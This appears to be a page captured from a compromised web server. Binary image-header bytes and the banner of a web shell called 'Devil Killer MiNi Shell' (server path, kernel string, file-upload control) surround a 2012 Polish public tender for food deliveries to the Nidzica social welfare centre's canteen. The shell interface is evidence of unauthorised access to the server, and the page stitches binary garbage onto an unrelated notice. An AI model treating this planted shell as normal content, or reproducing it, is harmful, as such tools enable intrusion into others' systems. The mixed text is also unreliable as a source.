JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121129/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121129/253261-N-2012.html

<p class="kh_header"><b>Nidzica: Dostawa produktów żywnościowych do stołówki  Miejskiego Ośrodka Pomocy Społecznej w Nidzicy</b><br>
<b>Numer ogłoszenia: 253261 - 2012; data zamieszczenia: 29.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Kolejowa 5/7, 13-100 Nidzica, woj. warmińsko-mazurskie, tel. 089 6252914, faks 089 625 81 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://nidzica-mops.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów żywnościowych do stołówki  Miejskiego Ośrodka Pomocy Społecznej w Nidzicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy zakres zamówienia został opisany w załączniku nr1 do SIWZ dostępnym na http://nidzica-mops.bip-wm.pl/.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje  udzielenie zamówień uzupełniających do 20 % wartości zamówienia podstawowego.
Zgodnie z art. 67 ust. 1 pkt. 7 Pzp przyjęto możliwość rozszerzenia przedmiotu zamówienia wymienionego w zamówieniu podstawowym. Zamówienie uzupełniające polegać będzie na powtórzeniu tego samego rodzaju zamówienia, w ramach, którego planuje się dokupienie artykułów spożywczych wskazanych w załączniku nr 1 do SIWZ i umowy</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.80.00.00-6, 15.50.00.00-3, 15.30.00.00-1, 15.31.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie żądał wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga żadnych dodatkowych dokumentów potwierdzających spełnianie tego warunku, jedynie podpisane oświadczenie - załącznik nr 4;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga żadnych dodatkowych dokumentów potwierdzających spełnianie tego warunku, jedynie podpisane oświadczenie - załącznik nr 4;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga żadnych dodatkowych dokumentów potwierdzających spełnianie tego warunku, jedynie podpisane oświadczenie - załącznik nr 4;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga żadnych dodatkowych dokumentów potwierdzających spełnianie tego warunku, jedynie podpisane oświadczenie - załącznik nr 4;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga żadnych dodatkowych dokumentów potwierdzających spełnianie tego warunku, jedynie podpisane oświadczenie - załącznik nr 4;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wzór umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy można dokonać w niżej wymienionych przypadkach:
1) zmiana danych teleadresowych,
2) zmiana wynagrodzenia spowodowana usługami dodatkowymi lub zamiennymi,
3) występowaniem okoliczności, których strony nie mogły przewidzieć, pomimo zachowanie należytej staranności- zmiana umowy nastąpi w zakresie terminu jej wykonania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://nidzica-mops.bip-wm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Nidzicy
13-100 Nidzica, ul. Kolejowa 5
pok. 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2012 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Nidzicy
13-100 Nidzica, ul. Kolejowa 5
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty zwierzęce i drobiowe: mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Schab bez kości, surowy 	kg	100
2	Karkówka wieprzowa b/k, surowa 	kg	100
3	Pasztetowa	kg	85
	-w naturalnym flaku 		
	 		
4	Łopatka bez kości, surowa	kg	450
			
5	Żeberka surowe	kg	80
	Chude bez boczku 		
	 		
6	Boczek wędzony parzony zawartość mięsa min. 55-60%	kg	80
7	Baleron	kg	60
8	Szynka surowa, bez kości	kg	150
			
9	Kiełbasa francuska 	kg	250
10	kiełbaski śląskie 	kg	250
11	Kiełbasa ogniskowa	Kg 	250
12	Parówki wieprzowe w folii	kg	220
	 - mięso wieprzowe (65-70%), tłuszcz wieprzowy, tkanka łączna wieprzowa, skrobia ziemniaczana, sól, białko sojowe, błonnik pszenny, glukoza, przyprawy		
13	Kiełbasa biała	kg	70
14	Szynka wędzona	kg	60
15	Ogonówka	kg	60
16	Serdelki w osłonce 	kg	220
			
17	Smalec(200g)	Szt.	500
18	Salceson	Kg	130
	-w naturalnym flaku		
19	Kaszanka jęczmienna 	Kg	150
	kasza jęczmienna, krew, głowizna, sól, pieprz, podgardle, skórki, sadło, cebula                                             		
20	Kaszanka gryczana 	Kg 	100
	-  kasza gryczana, krew, głowizna, skórki, sadło, podgardle, wątroba wieprzowa, cebula, sól, pieprz		
21	Wątróbka wieprzowa, surowa 	kg	80
22	Wędlina mielonka	kg	60
23	Skrawki indycze	kg	15
24	Żołądki indycze 	kg	25
25	Udka z kurczaka	kg	450
26	Porcje rosołowe z kurczaka 	kg	850
	-ze skrzydełkami.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.      	Cukier w oryginalnych opakowaniach 1kg	 Kg	200
	-biały		
2.      	Cukier puder w opakowaniach 0,5kg	Kg	20
	-biały mielony		
3.      	Cukier waniliowy w opakowaniach 32 g	Szt.	60
4.      	Kasza jęczmienna w oryginalnych opakowaniach 5kg	Kg	100
	-drobna		
5.      	Kasza gryczana w oryginalnych opakowaniach 5 kg	Kg	80
			
	-prażona		
6.      	Ryż biały długoziarnisty  w oryginalny opakowaniach 1 kg	Kg	250
7.      	Mąka luksusowa w oryginalnych opakowaniach 1kg	Kg	380
	-pszenna		
8.      	Mąka tortowa w oryginalnych opakowaniach 1 kg 	Kg 	30
	-pszenna		
9.      	Mąka ziemniaczana w oryginalnych opakowaniach 1 kg 	Kg 	10
10.   	Makaron nitki, kolanka,  łazanki, świderki, gwiazdki, spaghetti w oryginalnych opakowaniach 3 kg 	Kg	250
 	 	 	 
11.   	Sól  kuchenna jodowana, biała drobna w oryginalnych opakowaniach 1kg	Kg	250
12.   	Dżem niskosłodzony- różne smaki (300g)	Szt.	100
	-zawartość cukru 35-40 g na 100g produktu 		
	 -35-40 g owoców na 100 g produktu		
13.   	Majeranek w oryginalnych opakowaniach  10g	Szt.	40
14.   	Liść laurowy w oryginalnych opakowaniach 7 g	Szt.	50
15.   	Pieprz ziołowy w oryginalnych opakowaniach  20g	Szt.	200
16.   	Koperek suszony w oryginalnych opakowaniach  20g	Szt.	120
17.   	Przyprawa do kurczaka w oryginalnych opakowaniach 20g	Szt.	30
18.   	Pietruszka suszona w oryginalnych opakowaniach 10g	Szt.	60
19.   	Papryka sypka w oryginalnych opakowaniach 20g	Szt.	100
20.   	Ziele angielskie w oryginalnych opakowaniach 15g	Szt.	50
21.   	Pieprz naturalny mielony w oryginalnych opakowaniach 20g	Szt.	220
22.   	Przyprawa w  płynie  do zup, mięs, tatara, innych potraw 900 ml	Szt.	30
	-skład: woda, sól, substancja wzmacniające smak i zapach 		
23.   	Wafel w polewie czekoladowej - kruchy wafelek z  kremem kakaowy od 48 do 50 %, czekolada 30-35 %            39g	Szt.	1300
24.   	Baton  czekoladowy z  nadzieniami: orzechowym, toffi, śmietankowym, waniliowym. Czekolada mleczna 50-60% 	Szt.	1000
25.   	Herbatniki  80 g	Szt.	300
26.   	Biszkopty  w polewie czekoladowej z galaretką (147g)	Szt.	1500
	-zawartość czekolady 10-15%		
	 		
27.   	Konserwa turystyczna w oryginalnych opakowaniach (130g)	Szt.	500
28.   	Gulasz angielski oryginalnych opakowaniach (130g)	Szt.	500
29.   	Paprykarz  szczeciński oryginalnych opakowaniach (130g)	Szt.	500
30.   	Tuńczyk w sosie własnym, konserwa 130g	Szt.	500
31.   	Ryba w sosie pomidorowym, konserwa 130g	Szt.	500
32.   	Mielonka, konserwa 130g	Szt.	500
33.   	Oliwa z oliwek 1000ml	Szt.	30
	-otrzymana bezpośrednio z oliwek		
34.   	Ocet 10% 0,5l	Szt.	50
35.   	Kwasek cytrynowy 20g	Szt.	50
36.   	bułka tarta0,5kg	Szt.	200
37.   	Koncentrat pomidorowy 900g)	Szt.	200
	-30%		
38.   	Przyprawa warzywna w  proszku do potraw 1 kg ( 15-20% suszone warzywa - marchew, pasternak, cebula, seler, natka pietruszki. , np. Kucharek lub równoważne 	Szt.	120
39.   	Olej 1L 	Szt.	220
	-100%		
40.   	Herbata	Szt.	30
	-min 100 szt. w opakowaniu 		
41.   	Ketchup pomidorowy w słoiku 815 g	Szt.	30
	-koncentrat pomidorowy 60-65 %		
42.   	Napój w  proszku (koncentrat)1 kg - różne smaki	Szt.	150
43.   	Sok marchwiowo bananowy zagęszczany  0,30l	Szt.	5000
	-przeciery i soki 55-60%, z różnego rodzaju owoców i warzyw		
44.   	Sok Jabłkowy 1l	Szt.	50
	-bez dodatku cukru		
45.   	Sok pomarańczowy 1l	Szt.	50
	-bez dodatku cukru		
46.   	Sok wieloowocowy 1l	Szt.	50
	Bez dodatku cukru		
47.   	Soczek ze słomką 003l	Szt.	6000
48.   	Draże czekoladowe 70g	Szt.	150
49.   	Kukurydza konserwowa 400g	Szt.	90
	-zawartość netto 400g		
	-po odlaniu zalewy 220 g		
50.   	Pasztet  z kurcząt w  puszcze  130 g	Szt.	800
51.   	Majonez sałatkowy 850g słoik	Szt.	50
	-Olej roślinny rafinowany, musztarda (woda, ocet, gorczyca, cukier, sól, zioła), woda, żółtka jaj kurzych (7-8%)		
	-bez konserwantów		
52.   	Musztarda300g )	Szt.	40
	-woda, gorczyca, ocet jabłkowy, cukier, sól, przyprawy, barwnik: kurkumina		
53.   	Ogórki konserwowe słoik 0,9	Szt.	200
	-ogórki, woda, ocet, cukier, sól, przyprawy (zawierają gorczycę)		
	 		
54.   	Sos grzybowy w proszku w  pudełku  1-1kg 	Kg	20
	-bez konserwantów		
55.     	Sos pomidorowy 2000g pakowany  w  puszcze	Szt.	90
	-pomidory 75-80%		
	-koncentrat 18-20%		
	-olej rośliny, sól, cukier, cebula, suszona, kwasek cytrynowy 		
56.   	Proszek do pieczenia 25g	Szt.	20
57.   	Cukierki czekoladowe (mieszanki firmowe)	Kg 	50
			
58.   	Czekolada pełnomleczna 100 g	Szt.	1500
	-czekolada mleczna 50-55% (cukier, tłuszcz kakaowy, miazga kakaowa, mleko pełne w proszku, serwatka w proszku, tłuszcz mleczny) 		
59.   	Czekolada z nadzieniem owocowym 100g	szt.	1000
	-czekolada mleczna (cukier, tłuszcz kakaowy, miazga kakaowa, mleko pełne w proszku, tłuszcz mleczny, emulgatory: lecytyna sojowa, E476, aromat		
	-nadzienie owocowe-różne smaki 		
60.   	Lizak	Szt.	300
61.   	Sok zagęszczony do rozcieńczania kompotu- różne smaki 500 ml 	Szt. 	100
62.   	Szczaw słoik 350 g	Szt.	200
	-siekany		
63.   	Zupka chińska z makaronem ( różne smaki) 50 g	Szt.	150
			
			
64.   	Zupa borowikowa w proszku 3kg	Szt.	10
	Wartość na 100g 		
	Energia kJ 1395-1400		
	Energia kcal 333-335 kcal		
	Tłuszcz 8-10 g		
	Białko 8-10 g		
	Węglowodany 55-60 g 		
65.   	Zupa kalafiorowa w proszku 3 kg 	Szt.	15
	Wartość na 100g 		
	Energia kJ 1612-1615		
	Energia kcal 380-385 kcal		
	Tłuszcz 12-13 g		
	Białko 8-10 g		
	Węglowodany 60-62 g 		
66.   	Zup pieczarkowa w proszku 3 kg	Szt.	15
	Wartość na 100g 		
	Energia kJ 1485-1450		
	Energia kcal 350 -355 kcal		
	Tłuszcz 10-12 g		
	Białko 8-10 g		
	Węglowodany 45-50g 		
67.   	Barszcz czerwony- zupa w proszku 3kg	Szt.	35
	Wartość na 100g 		
	Energia kJ 1410-1415		
	Energia kcal 333 -336 kcal		
	Tłuszcz 8-10 g		
	Białko 3-5 g		
	Węglowodany 50-55g 		
68.   	Barszcz biały - zupa w proszku 3 kg	Szt.	50
	Wartość na 100g 		
	Energia kJ 1394-1400		
	Energia kcal 330 -335 kcal		
	Tłuszcz 8-10 g		
	Białko 8-10 g węglowodany 50-55 g 		
	 		
69.   	Żurek- zupa w proszku 3 kg	Szt.	10
	Energia kJ 1270-1275		
	Energia kcal 300-305 kcal		
	Tłuszcz 7-10 g		
	Białko 10-12 g		
	Węglowodany 48-50g 		
70.   	Żurek -koncentrat w płynie 500ml	Szt. 	50
71.   	Zupa ogonowa w proszku 3 kg	Szt.	10
	Wartość na 100g 		
	Energia kJ 1300-1320		
	Energia kcal 314 -320 kcal		
	Tłuszcz 8-10 g		
	Białko 13-15 g		
	Węglowodany 35-40 g 		
	Wydajność ok. 25 l 		
72.   	Zupa szparagowa w proszku 3 kg	Szt. 	10
	Wartość na 100g 		
	Energia kJ 1512-1515		
	Energia kcal 355 -360 kcal		
	Tłuszcz 8-10 g		
	Białko 8-10 g		
	Węglowodany 55-60 g 		
73.   	Zupa brokułowa w proszku 3 kg	Szt..	10
	Wartość na 100g 		
	Energia kJ 1395-1400		
	Energia kcal 333-335 kcal		
	Tłuszcz 8-10 g		
	Białko 8-10 g		
	Węglowodany 60-63 g 		
74.   	Groszek konserwowy 400 g	Szt.	150
	-zawartość netto 400g		
	-po odlaniu zalewy 220 g		
75.   	Fasola w  opakowaniach 5 kg	kg	100
	-drobna 		
76.   	Fasola Jaś w opakowaniach 5 kg	kg	20
77.   	Groch łuskany połówki w opakowaniach  5 kg	kg	170
78.   	Chrzan w słoiczku 300 g	Szt.	10
79.   	Kakao 	Szt.	10
80.   	Krem czekoladowy z orzechami laskowymi do smarowania pieczywa. Nie zawiera substancji konserwujących  i barwników. 250g	Szt.	50
81.   	Rosół z kury 3 kg	Szt.	20
	Energia kJ 985-990		
	Energia kcal 240 -250 kcal		
	Tłuszcz 8-10 g		
	Białko 8-10 g		
	Węglowodany 31-33 g 		
82.   	Sos do spaghetti (bolognese, słodko kwaśny) w słoiku 800 g 	szt.	10
83.   	Sos sałatkowy w proszku 9g	Szt. 	50
	-różne smaki		
84.   	Barszcz czerwony - koncentrat	Szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Masło śmietankowe 200 g	Szt.	170
2. Mleko 3,2 karton 1l	Szt.	350
3. Śmietana 30% 0,5l karton 	Szt.	1000
4. Śmietana 12% kubek 200g	Szt.	100
5. Jogurt owocowy z  kawałkami owoców ( 9% owoców)	Szt.	3000
	150-g		
6. Jogurt owocowy bez kawałków owoców 150-g 	Szt.	1000
7. Ser biały twarogowy półtłusty	kg	100
8. Ser twardy równoważnik gouda	kg	10
9. Serek homogenizowany (waniliowy) 150 g	Szt.	1500
10.Serek homogenizowany owocowy 140g 	Szt.	2000
11.Serek homogenizowany czekoladowy 140g	Szt.	1500
12.deser -kaszka z sosem- różne smaki	szt.	1800
13.serek wiejski - twaróg ziarnisty z owocami lub naturalny 	szt.  	1800
14.Deser ryż na mleku- różne smaki	szt.  	1800
15.Deser z koroną - różne smaki z bitą śmietaną 175g 	Szt.	1000
16.Serek topiony  ( w prostokącie) (100 g)	Szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-9, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Owoce, warzywa i podobne produkty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.     	Marchew 	kg	200
2.     	Pietruszka 	kg	30
3.     	Cebula 	kg	260
4.     	Kapusta biała 	kg	250
5.     	Kapusta młoda	Szt.	250
6.     	Kapusta pekińska	kg	100
7.     	Ogórki szklarniowe 	kg	150
8.     	Buraki	kg	360
9.     	Pomidory szklarniowe	kg	30
10.   	Kalafior 	Szt.	50
11.   	Papryka 	kg	10
12.   	Pieczarki	kg	150
13.   	Kapusta kiszona	kg	400
14.   	Ogórki kwaszone	kg	250
15.   	Truskawki świeże	kg	30
16.   	Jabłka I gatunek 	kg	700
17.   	Mandarynki	kg	100
18.   	Cytryny	kg	8
19.   	Seler 	kg	80
20.   	Por 	Szt.	50
21.   	Banan	kg	300
22.   	Pomarańcza	kg	300
23.   	Kiwi	Szt.	200
24.   	Brzoskwinia	Kg 	100
25.   	Nektarynka 	Kg 	100
26.   	Morela 	kg	50
27.   	Winogron 	kg	50
28.   	Sałata zielona 	Szt.	100
29.   	Jajko 	Szt.	4900
30.   	Koper- pęczek	Szt.	20
31.   	Czosnek 	Szt.	20
32.   	Rzodkiewka	pęczek	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
